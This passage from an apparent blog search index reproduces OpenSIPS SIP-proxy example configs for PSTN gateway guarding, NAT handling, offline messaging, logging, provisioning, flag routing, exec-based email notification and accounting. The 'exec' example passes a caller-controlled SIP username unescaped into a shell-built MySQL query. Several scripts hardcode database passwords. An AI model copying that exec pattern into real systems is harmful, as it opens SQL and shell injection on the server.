\u0026#34;acc.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; loadmodule \u0026#34;group.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; # ----------------- setting module-specific parameters --------------- modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # that is the flag for which we will account -- don\u0026#39;t forget to # set the same one :-) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { log(\u0026#34;LOG: Too many hops\\n\u0026#34;); sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; /* ********* RR ********************************** */ /* grant Route routing if route headers present */ if (loose_route()) { t_relay(); exit; }; /* record-route INVITEs -- all subsequent requests must visit us */ if ($rm==\u0026#34;INVITE\u0026#34;) { record_route(); }; # now check if it really is a PSTN destination which should be handled # by our gateway; if not, and the request is an invitation, drop it -- # we cannot terminate it in PSTN; relay non-INVITE requests -- it may # be for example BYEs sent by gateway to call originator if (!$ru=~\u0026#34;sip:\\+?[0-9]+@.*\u0026#34;) { if ($rm==\u0026#34;INVITE\u0026#34;) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;Call cannot be served here\u0026#34;); } else { forward(); }; exit; }; # account completed transactions via syslog setflag(1); # free call destinations ... no authentication needed if ( is_user_in(\u0026#34;Request-URI\u0026#34;, \u0026#34;free-pstn\u0026#34;) /* free destinations */ || $ru=~\u0026#34;sip:[79][0-9][0-9][0-9]@.*\u0026#34; /* local PBX */ || $ru=~\u0026#34;sip:98[0-9][0-9][0-9][0-9]\u0026#34;) { log(\u0026#34;free call\u0026#34;); } else if ($si==192.168.0.10) { # our gateway doesn\u0026#39;t support digest authentication; # verify that a request is coming from it by source # address log(\u0026#34;gateway-originated request\u0026#34;); } else { # in all other cases, we need to check the request against # access control lists; first of all, verify request # originator\u0026#39;s identity if (!proxy_authorize(\t\u0026#34;gateway\u0026#34; /* realm */, \u0026#34;subscriber\u0026#34; /* table name */)) { proxy_challenge( \u0026#34;gateway\u0026#34; /* realm */, \u0026#34;0\u0026#34; /* no qop */ ); exit; }; # authorize only for INVITEs -- RR/Contact may result in weird # things showing up in d-uri that would break our logic; our # major concern is INVITE which causes PSTN costs if ($rm==\u0026#34;INVITE\u0026#34;) { # does the authenticated user have a permission for local # calls (destinations beginning with a single zero)? # (i.e., is he in the \u0026#34;local\u0026#34; group?) if ($ru=~\u0026#34;sip:0[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;local\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;No permission for local calls\u0026#34;); exit; }; # the same for long-distance (destinations begin with two zeros\u0026#34;) } else if ($ru=~\u0026#34;sip:00[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;ld\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34; no permission for LD \u0026#34;); exit; }; # the same for international calls (three zeros) } else if ($ru=~\u0026#34;sip:000[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;int\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;International permissions needed\u0026#34;); exit; }; # everything else (e.g., interplanetary calls) is denied } else { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;Forbidden\u0026#34;); exit; }; }; # INVITE to authorized PSTN }; # authorized PSTN # if you have passed through all the checks, let your call go to GW! rewritehostport(\u0026#34;192.168.0.10:5060\u0026#34;); # forward the request now if (!t_relay()) { sl_reply_error(); exit; }; } ","permalink":"https://wdd.js.org/opensips/ch8/pstn/","summary":"# # $Id$ # # example: ser configured as PSTN gateway guard; PSTN gateway is located # at 192.168.0.10 # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; loadmodule \u0026#34;group.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; # ----------------- setting module-specific parameters --------------- modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # that is the flag for which we will account -- don\u0026#39;t forget to # set the same one :-) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!","title":"pstn"},{"content":"# # simple quick-start config script including nathelper support # This default script includes nathelper support. To make it work # you will also have to install Maxim\u0026#39;s RTP proxy. The proxy is enforced # if one of the parties is behind a NAT. # # If you have an endpoing in the public internet which is known to # support symmetric RTP (Cisco PSTN gateway or voicemail, for example), # then you don\u0026#39;t have to force RTP proxy. If you don\u0026#39;t want to enforce # RTP proxy for some destinations than simply use t_relay() instead of # route(1) # # Sections marked with !! Nathelper contain modifications for nathelper # # NOTE !! This config is EXPERIMENTAL ! # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) port=5060 children=4 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # db_mysql.so must be loaded ! #loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # !! Nathelper loadmodule \u0026#34;nathelper.so\u0026#34; loadmodule \u0026#34;rtpproxy.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which true in this config), # uncomment also the following parameter) #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # !! Nathelper modparam(\u0026#34;usrloc\u0026#34;,\u0026#34;nat_bflag\u0026#34;,6) modparam(\u0026#34;nathelper\u0026#34;,\u0026#34;sipping_bflag\u0026#34;,8) modparam(\u0026#34;nathelper\u0026#34;, \u0026#34;ping_nated_only\u0026#34;, 1) # Ping only clients behind NAT # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # !! Nathelper # Special handling for NATed clients; first, NAT test is # executed: it looks for via!=received and RFC1918 addresses # in Contact (may fail if line-folding is used); also, # the received test should, if completed, should check all # vias for rpesence of received if (nat_uac_test(\u0026#34;3\u0026#34;)) { # Allow RR-ed requests, as these may indicate that # a NAT-enabled proxy takes care of it; unless it is # a REGISTER if (is_method(\u0026#34;REGISTER\u0026#34;) || !is_present_hf(\u0026#34;Record-Route\u0026#34;)) { log(\u0026#34;LOG:Someone trying to register from private IP, rewriting\\n\u0026#34;); # This will work only for user agents that support symmetric # communication. We tested quite many of them and majority is # smart enough to be symmetric. In some phones it takes a # configuration option. With Cisco 7960, it is called # NAT_Enable=Yes, with kphone it is called \u0026#34;symmetric media\u0026#34; and # \u0026#34;symmetric signalling\u0026#34;. # Rewrite contact with source IP of signalling fix_nated_contact(); if ( is_method(\u0026#34;INVITE\u0026#34;) ) { fix_nated_sdp(\u0026#34;1\u0026#34;); # Add direction=active to SDP }; force_rport(); # Add rport parameter to topmost Via setbflag(6); # Mark as NATed # if you want sip nat pinging # setbflag(8); }; }; # subsequent messages withing a dialog should take the # path determined by record-routing if (loose_route()) { # mark routing logic in request append_hf(\u0026#34;P-hint: rr-enforced\\r\\n\u0026#34;); route(1); exit; }; # we record-route all messages -- to make sure that # subsequent messages will go through our proxy; that\u0026#39;s # particularly good if upstream and downstream entities # use different transport protocol if (!is_method(\u0026#34;REGISTER\u0026#34;)) record_route(); if (!is_myself(\u0026#34;$rd\u0026#34;)) { # mark routing logic in request append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(1); exit; }; # if the request is for other domain use UsrLoc # (in case, it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if (is_method(\u0026#34;REGISTER\u0026#34;)) { # Uncomment this if you want to use digest authentication #if (!www_authorize(\u0026#34;siphub.org\u0026#34;, \u0026#34;subscriber\u0026#34;)) { #\twww_challenge(\u0026#34;siphub.org\u0026#34;, \u0026#34;0\u0026#34;); #\treturn; #}; save(\u0026#34;location\u0026#34;); exit; }; lookup(\u0026#34;aliases\u0026#34;); if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound alias\\r\\n\u0026#34;); route(1); exit; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; append_hf(\u0026#34;P-hint: usrloc applied\\r\\n\u0026#34;); route(1); } route[1] { # !! Nathelper if ($ru=~\u0026#34;[@:](192\\.168\\.|10\\.|172\\.(1[6-9]|2[0-9]|3[0-1])\\.)\u0026#34; \u0026amp;\u0026amp; !search(\u0026#34;^Route:\u0026#34;)){ sl_send_reply(\u0026#34;479\u0026#34;, \u0026#34;We don\u0026#39;t forward to private IP addresses\u0026#34;); exit; }; # if client or server know to be behind a NAT, enable relay if (isbflagset(6)) { rtpproxy_offer(); }; # NAT processing of replies; apply to all transactions (for example, # re-INVITEs from public to private UA are hard to identify as # NATed at the moment of request processing); look at replies t_on_reply(\u0026#34;1\u0026#34;); # send it out now; use stateful forwarding as it works reliably # even for UDP2TCP if (!t_relay()) { sl_reply_error(); }; } # !! Nathelper onreply_route[1] { # NATed transaction ? if (isbflagset(6) \u0026amp;\u0026amp; $rs =~ \u0026#34;(183)|2[0-9][0-9]\u0026#34;) { fix_nated_contact(); rtpproxy_answer(); # otherwise, is it a transaction behind a NAT and we did not # know at time of request processing ? (RFC1918 contacts) } else if (nat_uac_test(\u0026#34;1\u0026#34;)) { fix_nated_contact(); }; } ","permalink":"https://wdd.js.org/opensips/ch8/nathelper/","summary":"# # simple quick-start config script including nathelper support # This default script includes nathelper support. To make it work # you will also have to install Maxim\u0026#39;s RTP proxy. The proxy is enforced # if one of the parties is behind a NAT. # # If you have an endpoing in the public internet which is known to # support symmetric RTP (Cisco PSTN gateway or voicemail, for example), # then you don\u0026#39;t have to force RTP proxy.","title":"nathelper"},{"content":"# # MSILO usage example # # $ID: daniel $ # children=2 check_via=no # (cmd. line: -v) dns=off # (cmd. line: -r) rev_dns=off # (cmd. line: -R) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;msilo.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- registrar params -- modparam(\u0026#34;registrar\u0026#34;, \u0026#34;default_expires\u0026#34;, 120) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # -- msilo params -- modparam(\u0026#34;msilo\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # -- tm params -- modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timer\u0026#34;, 10 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timer\u0026#34;, 15 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;wt_timer\u0026#34;, 10 ) route{ if ( !mf_process_maxfwd_header(\u0026#34;10\u0026#34;) ) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;To Many Hops\u0026#34;); exit; }; if (is_myself(\u0026#34;$rd\u0026#34;)) { # for testing purposes, simply okay all REGISTERs # is_method(\u0026#34;XYZ\u0026#34;) is faster than ($rm==\u0026#34;XYZ\u0026#34;) # but requires textops module if (is_method(\u0026#34;REGISTER\u0026#34;)) { save(\u0026#34;location\u0026#34;); log(\u0026#34;REGISTER received -\u0026gt; dumping messages with MSILO\\n\u0026#34;); # MSILO - dumping user\u0026#39;s offline messages if (m_dump()) { log(\u0026#34;MSILO: offline messages dumped - if they were\\n\u0026#34;); } else { log(\u0026#34;MSILO: no offline messages dumped\\n\u0026#34;); }; exit; }; # backup r-uri for m_dump() in case of delivery failure $avp(11) = $ru; # domestic SIP destinations are handled using our USRLOC DB if(!lookup(\u0026#34;location\u0026#34;)) { if (! t_newtran()) { sl_reply_error(); exit; }; # we do not care about anything else but MESSAGEs if (!is_method(\u0026#34;MESSAGE\u0026#34;)) { if (!t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not found\u0026#34;)) { sl_reply_error(); }; exit; }; log(\u0026#34;MESSAGE received -\u0026gt; storing using MSILO\\n\u0026#34;); # MSILO - storing as offline message if (m_store(\u0026#34;$ru\u0026#34;)) { log(\u0026#34;MSILO: offline message stored\\n\u0026#34;); if (!t_reply(\u0026#34;202\u0026#34;, \u0026#34;Accepted\u0026#34;)) { sl_reply_error(); }; }else{ log(\u0026#34;MSILO: offline message NOT stored\\n\u0026#34;); if (!t_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;)) { sl_reply_error(); }; }; exit; }; # if the downstream UA does not support MESSAGE requests # go to failure_route[1] t_on_failure(\u0026#34;1\u0026#34;); t_relay(); exit; }; # forward anything else t_relay(); } failure_route[1] { # forwarding failed -- check if the request was a MESSAGE if (!is_method(\u0026#34;MESSAGE\u0026#34;)) exit; log(1,\u0026#34;MSILO: the downstream UA does not support MESSAGE requests ...\\n\u0026#34;); # we have changed the R-URI with the contact address -- ignore it now if (m_store(\u0026#34;$avp(11)\u0026#34;)) { log(\u0026#34;MSILO: offline message stored\\n\u0026#34;); t_reply(\u0026#34;202\u0026#34;, \u0026#34;Accepted\u0026#34;); }else{ log(\u0026#34;MSILO: offline message NOT stored\\n\u0026#34;); t_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/msilo/","summary":"# # MSILO usage example # # $ID: daniel $ # children=2 check_via=no # (cmd. line: -v) dns=off # (cmd. line: -r) rev_dns=off # (cmd. line: -R) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;msilo.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- registrar params -- modparam(\u0026#34;registrar\u0026#34;, \u0026#34;default_expires\u0026#34;, 120) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # -- msilo params -- modparam(\u0026#34;msilo\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # -- tm params -- modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timer\u0026#34;, 10 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timer\u0026#34;, 15 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;wt_timer\u0026#34;, 10 ) route{ if ( !","title":"msilo"},{"content":"# # logging example # # ------------------ module loading ---------------------------------- port=5060 log_stderror=yes log_level=3 # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if (is_method(\u0026#34;REGISTER\u0026#34;)) { log(1, \u0026#34;REGISTER received\\n\u0026#34;); } else { log(1, \u0026#34;non-REGISTER received\\n\u0026#34;); }; if ($ru=~\u0026#34;sip:.*[@:]siphub.net\u0026#34;) { xlog(\u0026#34;request for siphub.net received\\n\u0026#34;); } else { xlog(\u0026#34;request for other domain [$rd] received\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/logging/","summary":"# # logging example # # ------------------ module loading ---------------------------------- port=5060 log_stderror=yes log_level=3 # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if (is_method(\u0026#34;REGISTER\u0026#34;)) { log(1, \u0026#34;REGISTER received\\n\u0026#34;); } else { log(1, \u0026#34;non-REGISTER received\\n\u0026#34;); }; if ($ru=~\u0026#34;sip:.*[@:]siphub.net\u0026#34;) { xlog(\u0026#34;request for siphub.net received\\n\u0026#34;); } else { xlog(\u0026#34;request for other domain [$rd] received\\n\u0026#34;); }; } ","title":"loggin"},{"content":"# # $Id$ # # this example shows use of opensips\u0026#39;s provisioning interface # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8888) loadmodule \u0026#34;mi_http.so\u0026#34; loadmodule \u0026#34;pi_http.so\u0026#34; modparam(\u0026#34;pi_http\u0026#34;, \u0026#34;framework\u0026#34;, \u0026#34;/usr/local/src/opensips/examples/pi_framework.xml\u0026#34;) loadmodule \u0026#34;mi_xmlrpc_ng.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ exit; } ","permalink":"https://wdd.js.org/opensips/ch8/httpd/","summary":"# # $Id$ # # this example shows use of opensips\u0026#39;s provisioning interface # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8888) loadmodule \u0026#34;mi_http.so\u0026#34; loadmodule \u0026#34;pi_http.so\u0026#34; modparam(\u0026#34;pi_http\u0026#34;, \u0026#34;framework\u0026#34;, \u0026#34;/usr/local/src/opensips/examples/pi_framework.xml\u0026#34;) loadmodule \u0026#34;mi_xmlrpc_ng.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ exit; } ","title":"httpd"},{"content":"# # simple quick-start config script # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) children=4 port=5060 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # mysql.so must be loaded ! #loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which true in this config), # uncomment also the following parameter) # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ setflag(1); t_on_failure(\u0026#34;1\u0026#34;); t_on_reply(\u0026#34;1\u0026#34;); log(1, \u0026#34;message received\\n\u0026#34;); t_relay(\u0026#34;udp:opensips.org:5060\u0026#34;); } onreply_route[1] { if (isflagset(1)) { log(1, \u0026#34;onreply: flag set\\n\u0026#34;); } else { log(1, \u0026#34;onreply: flag unset\\n\u0026#34;); }; } failure_route[1] { if (isflagset(1)) { log(1, \u0026#34;failure: flag set\\n\u0026#34;); } else { log(1, \u0026#34;failure: flag unset\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/flag-reply/","summary":"# # simple quick-start config script # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) children=4 port=5060 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.","title":"flag_reply"},{"content":"# # $Id$ # # simple quick-start config script # # ----------- global configuration parameters ------------------------ #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;exec.so\u0026#34; # ----------------- setting module-specific parameters --------------- route{ # uri for my domain ? if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { save(\u0026#34;location\u0026#34;); return; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { # proceed to email notification if ($rm==\u0026#34;INVITE\u0026#34;) route(1) else sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; # user found, forward to his current uri now if (!t_relay()) { sl_reply_error(); }; } /* handling of missed calls */ route[1] { # don\u0026#39;t continue if it is a retransmission if ( !t_newtran()) { sl_reply_error(); exit; }; # external script: lookup user, if user exists, send # an email notification to him if (!exec_msg(\u0026#39; QUERY=\u0026#34;select email_address from subscriber where user=\\\u0026#34;$$SIP_OUSER\\\u0026#34;\u0026#34;; EMAIL=`mysql -Bsuser -pheslo -e \u0026#34;$$QUERY\u0026#34; ser`; if [ -z \u0026#34;$$EMAIL\u0026#34; ] ; then exit 1; fi ; echo \u0026#34;SIP request received from $$SIP_HF_FROM for $$SIP_OUSER\u0026#34; | mail -s \u0026#34;request for you\u0026#34; $$EMAIL \u0026#39;)) { # exec returned error ... user does not exist # send a stateful reply t_reply(\u0026#34;404\u0026#34;, \u0026#34;User does not exist\u0026#34;); } else { t_reply(\u0026#34;600\u0026#34;, \u0026#34;No messages for this user\u0026#34;); }; exit; } ","permalink":"https://wdd.js.org/opensips/ch8/exec/","summary":"# # $Id$ # # simple quick-start config script # # ----------- global configuration parameters ------------------------ #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;exec.so\u0026#34; # ----------------- setting module-specific parameters --------------- route{ # uri for my domain ? if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { save(\u0026#34;location\u0026#34;); return; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { # proceed to email notification if ($rm==\u0026#34;INVITE\u0026#34;) route(1) else sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; # user found, forward to his current uri now if (!","title":"exec"},{"content":"# # $Id$ # # example: accounting calls to nummerical destinations # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- acc params -- # set the reporting log level modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # number of flag, which will be used for accounting; if a message is # labeled with this flag, its completion status will be reported modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { log(\u0026#34;LOG: Too many hops\\n\u0026#34;); sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # Process record-routing if (loose_route()) { # label BYEs for accounting if (is_method(\u0026#34;BYE\u0026#34;)) setflag(1); t_relay(); exit; }; # labeled all transaction for accounting setflag(1); # record-route INVITES to make sure BYEs will visit our server too if (is_method(\u0026#34;INVITE\u0026#34;)) record_route(); # forward the request statefuly now; (we need *stateful* forwarding, # because the stateful mode correlates requests with replies and # drops retranmissions; otherwise, we would have to report on # every single message received) if (!t_relay()) { sl_reply_error(); exit; }; } ","permalink":"https://wdd.js.org/opensips/ch8/acc/","summary":"# # $Id$ # # example: accounting calls to nummerical destinations # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- acc params -- # set the reporting log level modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # number of flag, which will be used for accounting; if a message is # labeled with this flag, its completion status will be reported 